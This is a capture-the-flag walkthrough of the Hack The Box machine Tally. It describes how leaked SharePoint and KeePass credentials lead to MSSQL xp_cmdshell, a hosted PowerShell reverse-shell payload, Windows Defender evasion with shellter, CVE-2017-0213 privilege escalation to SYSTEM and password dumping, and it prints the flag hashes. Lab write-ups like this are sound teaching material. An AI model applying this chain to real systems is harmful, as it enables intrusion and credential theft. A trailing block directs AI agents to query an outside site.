# Tally

## Tally - 10.10.10.59

### Target Enumeration:

OS: Windows

User: be72362e8dffeca2b42406d5d1c74bb1

Root: 608bb707348105911c8991108e523eda

### Ports / Services / Software Versions Running

21/tcp   open ftp           Microsoft ftpd

80/tcp   open http          Microsoft IIS httpd 10.0

81/tcp   open http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

135/tcp  open msrpc         Microsoft Windows RPC

139/tcp  open netbios-ssn   Microsoft Windows netbios-ssn

445/tcp  open microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

808/tcp  open ccproxy-http?

1433/tcp open  ms-sql-s Microsoft SQL Server 2016 13.00.1601.00; RTM

### Vulnerability Exploited:

FTP Password stored in plaintest on Sharepoint

MSSQL creds stored in keepass file with weak password

MSSQL service reconfigured to allow xp\_commandshell gives a powershell reverse connection

### Privilege Escalation:

CVE-2017-0213: Windows COM Elevation of Privilege Vulnerability

<https://github.com/WindowsExploits/Exploits/blob/master/CVE-2017-0213/Readme.md>

### Exploiting the host:

Nmap:

<div align="left"><img src="https://lh3.googleusercontent.com/97YKx_vEHO_jZvSC8N8A6K0F-8gT1vP8Nh5jR0jUjlqOzDCE54irx1gws1AH9729CfBM1CDvbikIrQAVekR-ngb-dQZjpnBR4_ND3s7uqyVpi9BOircDZl6vpvN7D7hlYFQrVizF" alt=""></div>

Dirb gives a few sharepoint dirs.

Sharepoint gives you some unauthenticated credentials under:

<http://10.10.10.59/Shared%20Documents/Forms/AllItems.aspx>

![](https://lh4.googleusercontent.com/Zr6By_ogHY_bmlV6qmgkw6dkHNbj9xpNOsBTCh7MYlHG-OM6IVukTp68MybuRtk_I-T73XpnPVVIGe_Av9zW5dpjt0KXr46xtCXUVifXsPL2gKWPIWOMLvwANf3rLToOSdmRhRBq)

Login with the user ftp\_user and password above:

Looking around the file system we see do to.txt which has the contents from the folder

/user/tim/project/log

<div align="left"><img src="https://lh5.googleusercontent.com/yHu5Xw6k5ue2raW14VajlcYhy6VHcdmf6b92absXwSKL7vgtVwFrwIgxzxxeZcxQ5MvrSku0Fj9QL0VzQU2inwpRiHrmtDkzz_VuDA6p6XPeHuO1jtf3til2QFljQ_YaNQA-b5uB" alt=""></div>

Looking further around the system we find the keepass file refrenced above in /user/tim/files

We grab the hash from the file

![](https://lh4.googleusercontent.com/S6MEVULmRfd4plIzJQOLa2ybNqZxGyzbhh9gvuFUik1TX8Cna0cdWjRbM51Y0c_2fxDL5dLAX4_1FlRegscSTKK-uwf9Otiscl4oqsk0Q0Lp8yvkO_LAWbS3tkCatGkIF5BT5rHy)

And crack it with john

![](https://lh4.googleusercontent.com/2WHgNMsTvq1pxy_uN21EZ5s6JDEbqAcCx6e4d6D_MZ8TakoYb1E1bFPr0VlkLzC9ceddbkLzWO42JuSOhWJ0Yr-8hL2RlSbIwfvUJwVHkzknbW8KGIou6UwHY6fCuGgSg6_rGi8-)

Login using kpcli and open the file now we have found some further creds

![](https://lh5.googleusercontent.com/-Ic-CiWUUce-bv0Bnonl047CDPTNaS9BiHrrqgZBuTQgoDnfo33EqO82019K-sC9P8A4DUzP_bRgi5Uc9vTzloauJhU2YIjcKz3kDdmxkrMiAGDy5b53vZ3wWtHh61HGdDdCiJR6)

Login to tally via smb and start enumerating the ACCT share for information.

The migration folder looks the most promising from the clue above:

Running strings on the tester.exe file gives you a sql password

![](https://lh4.googleusercontent.com/YbwfrOu38cHzFlhJMNCe4VM6n-5J8pwfLytd5z7r0Ndu5Fp5eW3a72Xh9wdIhF9139ps670I-lmOPeFa8QfEwbI7rzblaCFS8NIC-m7O__3sIaVXMlM5E0a_6yoVtjPkpjTrowV_)

Now login to the sqlserver using sqsh

![](https://lh5.googleusercontent.com/Qmfbmhy7JlAvH5U7FhTWLz3znINZOZ5o9TWVN3ZqUrhe0uV-jRaYwnTA0QfYFLdaKh596NEuS8cVpCT4E13WkSW_91yumvTVVmG6YVDKJESgIPdtyppgIq1-xRlj4aB3gAHCX67r)

Reconfigure to run system commands

![](https://lh4.googleusercontent.com/O6Er0l2lM_QAUrX7ulRZSfLqkVaRjmSiWOnoWNkozw44T0rWuGQdM30D5f22vhMOiTaB1wTDUhE1WZu3b78bvP9ZOz5atQFGHpQchDQhwY9Rn6BLnBzOR7BdMZKmkI5XNgTzwXg9)

There is windows defender on the target which detects most reverse shells so use setoolkit

![](https://lh5.googleusercontent.com/PukDb_SSiSGda7C8YajLunYX1hKVRIA3GXBwZD_bkgEcux2vyWgmkJyp-xNUbcjMcjW2pGk-gpxUAIYfTphWjdx2cTix5vtp0kFcEl8aURa4A3S2_vfrVSbIIMLT7dLw_1WKCPJ0)

Move the payload to Shell2.ps1 and host it with python, set up your metasploit listener

Download and execute with xp\_cmdshell

![](https://lh6.googleusercontent.com/YRYp_DRYAkk32zn6cp-T_1ER63yqdobPaGyOoRCWEm0hOTC5MJxh9gOnxMGN659a_taEPp_sSweFv1jZKIN1Qg-EFCsHen1Kr3WWM5cvTL-lVYzKCRpWrABDXaMVgQhYv74cTBCE)

Now you have a shell

![](https://lh4.googleusercontent.com/CIAzPsX_BFW_s9w0asGfLQo918qWnNBEAJu3ddeKg7rh0XKULjnron6F08sKZqtr13N_c4XHNG-SPyKCzjgYZmSQXEOPTZnl_8lCDw56G2gHiabqDEewjKMB1Fhap9ZdI_onk7VM)

There is  a hint that the current patches are not upto date

![](https://lh4.googleusercontent.com/EtyQaCiOTXnpL0McV1cce-9DtGdiV_jfJdxEW2jomUrgslzNDsihvFcgPcrWOmDcPG-C0AXlYNeIrJFxOtx7o4uX0hYfEzki1S5NEs3TXjKPjFyNOgGhT1nRqzRHeFj8SJUgQhJA)

Looks like the machine has been locked down and has Windows Defender installed.

![](https://lh3.googleusercontent.com/4Aa57asGnf8zG6VtXFg26aoDUKmG_9LPI8zkny9L05e7c5kgkLDkvOuTsx59l30tgWP2bWfLWohZsc2zLlDTdz8-kz61xB7sv8oSAklKwLCQeAncbpSay68zVnIWqrlUQbJyXoDW)

Download winrar 32 bit and encode a reverse shell with shellter

Upload it to the target and see if it bypasses Windows Defender, once successfully uploaded open a few more shells incase our one dies off. We will also need this file for root.

Running systeminfo shows us that there are only 2 hotfixes installed and after trying numerous exploits against the host we find the following which works:

<https://www.exploit-db.com/raw/42020/>

![](https://lh4.googleusercontent.com/PRAGkBGYZmsIpaNHEDqVAlJZJXdMonthcJEL1S7LdS2nL0Po9sqgDdnh6Or9jEX1Mot3_9LAWA47Of-nvjwPYZM6NFdIfCSqV76OzLSkLmD87wozc2hG8cf6MlOB4DNIzw-f8PP-)

Download the compiled exploit from:

<https://github.com/WindowsExploits/Exploits/blob/master/CVE-2017-0213/Readme.md>

Migrate to explorer.exe

Upload the exploit to the target system and rename your root shell as cmd.exe

Run the file

Now you will have a system shell

![](https://lh6.googleusercontent.com/8AaJcPddqGnS1-oZPPWMmXHM0EuXm5T7XrLIAp1sc4iuhX2W-apgZLQ1Kkn6T7HI34zK3amQx6QP0ctr9-NJE31pdYNj_m5pLXksddRIqRRHBe20glkEdU6yFpCxSzz4QZeVySHj)

System Shell:

![](https://lh6.googleusercontent.com/VAip9aQQARWQ-83rNDUbKzl5ZCOTML0hz813n8-JR_Z8S7ppV00lVPRQOxRSbAvzVw0HGc2j0MOuvioWoMkrJOqOBA59iXaosUxT3sVkSAf-prmYhl3cXLmAHU0s7g0ThrEk9Ip0)

Now capture your flag:

![](https://lh3.googleusercontent.com/NPa2Qno_TLHLLUUGQsJfmTbbgqBDVVGIEvDU7oqaHFB2i1EUW_YHrWySQOl-jiy20cm5pM6jkwPoV5DaxXJehz5PIwybBlBqSE6l4jx5l-lhkunX3ysQmj2f4TFK7vWTZVR4TQgM)

Dump the plaintext passwords

![](https://lh3.googleusercontent.com/NzUQ7QluyiWXZ5UOIJgNYaROxEInOzGDmRy3p7Qrzdp2LBLWkDpHN7lTlLALhmWguGdPsRHDVc1IL3IEzYkg_lb2KRvbzQohgWreT-LUwHnWz0odbmh3nI26pLlJmNhE1VyF54Eh)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.jdksec.com/hack-the-box/tally.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.